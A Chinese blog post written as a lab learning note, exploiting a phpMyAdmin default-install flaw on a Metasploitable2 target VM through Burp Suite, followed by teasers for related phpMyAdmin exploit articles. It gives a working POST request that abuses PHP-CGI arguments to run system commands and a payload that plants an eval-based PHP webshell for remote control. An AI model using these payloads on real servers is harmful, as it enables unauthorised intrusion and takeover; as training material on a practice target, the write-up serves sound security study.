记【phpMyAdmin默认安装漏洞】

最新推荐文章于 2025-03-13 06:58:28 发布
最新推荐文章于 2025-03-13 06:58:28 发布
阅读量4.1k 收藏 6
点赞数 1
文章标签: phpMyAdmin  默认安装漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42342141/article/details/103015210
版权

一、工具

BrupSuit
菜刀——蚁剑
kali
靶机 Metasploitable2
只要是基于php-mysql 的服务器(靶机) 一般都可尝试去查看是否存在这个漏洞

二、 /setup 目录

mysql默认安装是会产生 /phpMyAdmin 这个目录, 而这个目录下有个 /setup 目录
在这里插入图片描述
这个目录可以在不登入的情况下访问,并对服务器的数据库进行配置
e.g.
在这里插入图片描述

基于安全考虑,一般服务器在配置好数据库后,
需对 phpMyAdmin这个目录进行访问控制,
或是禁用某些文件目录,让外网不能查看!

三、具体实现步骤

3.1、利用 BrupSuit Repeater 模块进行 “重放”

POST 
http://192.168.47.133/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
HOST:192.168.47.133
Content-Length: 34

<?php
passthru('id');
die();
?>

将上面的代码放入 Repeater 中
在这里插入图片描述
Target 目标设置 靶机IP 和 端口
在这里插入图片描述
点击 GO 在 Response 模块发现 www-data 这个当前用户
到这算是验证成功了
在这里插入图片描述

3.2、代码解析

POST 
http://192.168.47.133/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
HOST:192.168.47.133
Content-Length: 34
-------------------------------------------
以上是post请求的整个头部 
phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
这条命令是配置php的 .ini 配置文件
HOST 这里写个假的也可以,我写的是目标主机的哈哈,无所谓这个
------------------------------------------
<?php
passthru('id');
die();
?>
----------------------------------------------
这个部分是在 网页 body 里的内容 
passthru()  这是php语言里用来执行系统指令的函数
id 是 系统查看当前登入用户名的指令
die() 只执行到 passthru() 这里就结束
----------------------------------------------
所以我们就可以执行系统的某些指令:
ls 、cat、cd、等等

3.3、写权限

一般用户可以在自己的目录下是有写的权限
在这里插入图片描述
发现的确新建了一个隐式 文件 a
可以 cat /var/www/a 查看写入的内容 aaabbb
在这里插入图片描述
到此我们就可以想象,既然有写的权限,那岂不是可以写个木马文件
说干就干

<?php
passthru('echo "<?php  @eval(\$_POST["hack"])?>" > /var/www/hack.php');
passthru('ls /var/www/');
passthru('cat /var/www/hack.php');
die();
?>

\  这是用来转义的 怕在传输过程中 $ 被过滤了

在这里插入图片描述
然后我们就能通过菜刀连接
我使用的是 蚁剑
连接具体参考:
蚁剑+DVWA(File Inclusion + Upload 漏洞)
蚁剑+DVWA(文件上传漏洞Upload)
在这里插入图片描述
进入它的虚拟终端文件管理数据库管理
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

我也不知道为什么比较喜欢拿别人的库2333333

PHP反弹shell实现

(这是渗透测试经常会使用的手段!)
突然发现有大佬已经写过了,那我就不写了!!!
果粒陈橙-手动漏洞挖掘 phpMyAdmin默认安装

初学者L_言
关注
phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1930
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
关于phpMyAdmin默认安装漏洞的学习笔
Mi1k7ea
03-01 6101
简单地说,phpMyAdmin安装在Web服务器上的接口界面,主要用于使用php来管理安装在服务器上的后台数据库。在老的版本中,若管理员没有对相应配置信息进行处理的话就会导致漏洞的存在。在dvwa中phpMyAdmin默认安装中会存在漏洞,用户可以在路径中不需要输入账号密码就可以直接访问其中的phpMyAdmin/setup目录: http://10.10.10.137/phpMyAdmin
漏洞复现-Phpmyadmin setup.php反序列化漏洞(WooYun-2016-199433)
01-04 4388
phpMyAdminSetup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
【2025最新】phpMyAdmin渗透利用全链路:信息收集→漏洞探测→后渗透提权技巧
最新发布
浩策盾悟
03-13 7737
phpinfo()/tmp/root得知 通过日志我们就可以进行其它渗透行为。
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 528
Phpmyadmin Scripts / setup.php反序列化漏洞(WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
手动漏洞挖掘 phpMyAdmin默认安装
胡乱写点什么
08-11 1444
手动漏洞挖掘(一) 学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。 —— phpMyAdmin默认安装漏洞—— 需要的工具: burpsuit 靶机(我选择的是Metasploitable2) 一.利用漏洞重放数据 首先在burpsuite的Repeater输入以下代码: POST http://192.168.52.130/php...
手工挖洞学习笔phpMyAdmin 默认安装漏洞(小白自学)/写入webshell/写入php反弹shell
AI_Jardon的博客
08-12 1161
phpMyAdmin 默认安装 工具: (1)burpsuite (2)靶机:Metasploitable2 前提: 靶机IP:192.168.1.175 由于是http协议,所以端口:80 验证漏洞 到达靶机源url 在url中插入:…//phpMyAdmin/setup 得到: 说明存在phpMyAdmin默认安装漏洞 利用漏洞 打开burpsuite —进入repeater 如图: 开始利用漏洞: 首先:编写目标IP、端口 输入前提上的目标IP、端口 注意:此处use HTTPS 针对于使用
phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
weixin_34343308的博客
03-21 2736
phpMyAdmin (/scripts/setup.php) PHP 注入代码 此漏洞代码在以下环境测试通过:phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu ...
phpMyAdmin漏洞利用与安全防范
02-25
但是,如果存在设置的Root密码过于简单,代码泄露Mysql配置等漏洞,通过一些技术手段,99%都能获取网站webshell,有的甚至是服务器权限。phpMyAdmin在一些流行架构中大量使用,例如phpStudy、phpnow、Wammp、Lamp、...
反序列化漏洞——http://159.75.16.25:8066 phpmyadmin scripts/setup.php 反序列化漏洞 http://159.75.16.25
m0_52341820的博客
04-14 481
php反序列化漏洞漏洞原理,如何防御此漏洞?如何利用此漏洞? 原理: 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果 防御: 进行签名与认证,避免应用接受黑客的异常输入 限制序列化与反序列化的类,避免接受任何处理类型 RASP检测,判断应用是否执行了非应用本身的逻辑 利用: 通过该漏洞,可以在内容中嵌入执行自定义命令的代码,获取服务器的权限 可以构造其他,导致耗尽服务器的CPU,停止服务 可以获得途径 2、http:
phpmyadmin setup.php 远程包含,phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
weixin_29616999的博客
03-28 674
漏洞代码在以下环境测试通过:phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2);攻击环境要求:phpMyAdmin版本:早于2.11.9.5的2.11.x和早于3.1.3.1的3.x;此漏洞只针对采用向导模式安装的ph...
phpMyAdmin漏洞安全防范
willow_liang的博客
11-28 1609
1.主要功能 数据库在线管理工具 操作数据. 执行mysq|命令 导出和导入数据库 网页版的mysq|管理工具 2.危害 MySQL数据库导出(数据库拖库) 执行导出Webshell 修改数据库 3.phpMyAdmin渗透利用思路 MySQL root密码暴力破解 源代码泄露 读取配置文件 root账号及权限三种方法获取Webshell SQLMAP直连数据库获取权限 社工方法来获取权限 4.phpMyAdmin防范思路 重命名文件夹. 禁止列目录漏洞 设置数据库高强度密
phpmyadmin漏洞汇总
m0_64481831的博客
05-27 2873
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
PhPMyadmin-漏洞复现
weixin_57682301的博客
08-03 646
前情提要:首先将我们的PHP版本设置在5.5以上。
phpMyAdmin setup.php脚本PHP代码注入漏洞
weixin_33736649的博客
06-19 488
影响版本: phpMyAdmin phpMyAdmin 3.xphpMyAdmin phpMyAdmin 2.11.x 漏洞描述: phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdminSetup脚本用于生成配置。如果远程***者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php 配置文件中包含...
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
Grace_for_it的博客
05-03 703
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
PhPMyadmin漏洞复现
cheapkiller的博客
08-03 458
首先我们打开环境,这个环境需要在小皮面板里安装,然后php版本需要在5.5+以上的版本才可以运行。点击变量按钮搜索gen会看到创建的文件夹的目录。然后打开网页根目录发现有生成的我们的木马。然后打开sql面板,将面板中的语句执行。然后在工具上进行连接测试。写入一个webshell。下一步写入文件导入即可。保证日志保存状态开启。
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 719
phpMyAdminSetup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpmyadmin漏洞分析复现
weixin_43047908的博客
08-19 1512
目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值